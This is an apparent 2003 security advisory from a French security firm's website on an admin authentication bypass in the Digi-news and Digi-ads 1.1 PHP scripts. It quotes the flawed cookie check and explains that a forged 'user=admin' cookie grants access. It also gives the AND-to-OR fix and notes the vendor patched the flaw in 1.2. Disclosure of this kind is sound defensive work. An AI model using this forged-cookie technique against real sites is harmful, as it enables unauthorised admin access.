Société de Sécurité Informatique - Audit Firewall Appliances
La sécurité informatique - La sécurité des informations

Digi-news and Digi-ads version 1.1 admin access without password


Overview


Digi-news and Digi-ads version 1.1 admin access without password
Discovered on 2003, March, 30th
Vendor: Digi-FX

Digi-news 1.1 is a PHP news editor. It allows you to easily add, edit, and delete news.
Digi-ad 1.1 is a PHP ad rotator. It allows you to easily add, edit, reset, and delete ads.
A vulnerability allows to access to the admin area in both script, without the administrator password.

Risk


Exploit easiness etoile1etoile1etoile1etoile1etoile1
Vulnerability spreading etoile1etoile1etoile0etoile0etoile0
Impact etoile1etoile1etoile1etoile1etoile1
Risk etoile1etoile1etoile1etoile1etoile0

Details


In Digi-news or Digi-ad, the admin web page is admin.php
Here is a sample of the admin authentification in this admin.php :

if (!isset($action)) {
   $action = '';
}
if ($action == 'auth') {
   auth();
}
if ((@$HTTP_COOKIE_VARS['user'] != $digiNews['user']) && (@$HTTP_COOKIE_VARS['pass'] != md5($digiNews['pass']))) {
   login();
   exit;
}
Continued as admin logged...


As you can see, the authentification scheme is based on a cookie. This cookie contains the user and the MD5 hashed password. But the programmer did a mistake :
if ((@$HTTP_COOKIE_VARS['user'] != $digiNews['user']) && (@$HTTP_COOKIE_VARS['pass'] != md5($digiNews['pass']))) {
It means that "Admin is authentificated" if "user = user in the cookie" OR "password = password in the cookie". In english, it means you don't need the admin password as far as you know the admin login !
The default admin login is "admin". If it doesn't work, try these :

Exploit


Ok, that's quite easy. You just have to send a handwrited cookie with user=admin in. You can do that with the well-known Proxomitron. Here is a proof of concept :


Regular HTTP GET command


You get the authentification page


Personalized HTTP GET command with the "user" cookie


You get the admin page !

Solution


The solution is to replace the AND operation by a OR operation, as followed :
if ((@$HTTP_COOKIE_VARS['user'] != $digiNews['user']) || (@$HTTP_COOKIE_VARS['pass'] != md5($digiNews['pass']))) {
The vendor has been informed and solved the problems. Download Digi-News 1.2 and Digi-ads 1.2

Discovered by


Arnaud Jacques aka scrap
webmaster@securiteinfo.com

Partagez cet article

Envoyer cet article par Email ! Imprimer cet article ! Exporter cet article en PDF ! Facebook Twitter Google Bookmarks

SecuriteInfo.com est une entreprise française de sécurité informatique. Nous proposons différentes solutions matérielles et prestations de services permettant de sécuriser les données des Systèmes d'Information d'entreprises ou de collectivités. Notre périmètre d'intervention couvre l'intégralité de votre système d'information : Sécurité périmétrique, réseaux, accès distants, VPN, solutions anti-spam et anti-malwares, différents audits réseaux et systèmes, vérification de la politique de sécurité, hébergement sécurisé ...
Facebook SecuriteInfo.com
Twitter de SecuriteInfo.com
Github de SecuriteInfo.com
Calculs scientifiques distribués contre les maladies, équipe SecuriteInfo.com
Profil Virustotal de SecuriteInfo.com
© 2004-2019 - Tous droits réservés - SecuriteInfo.com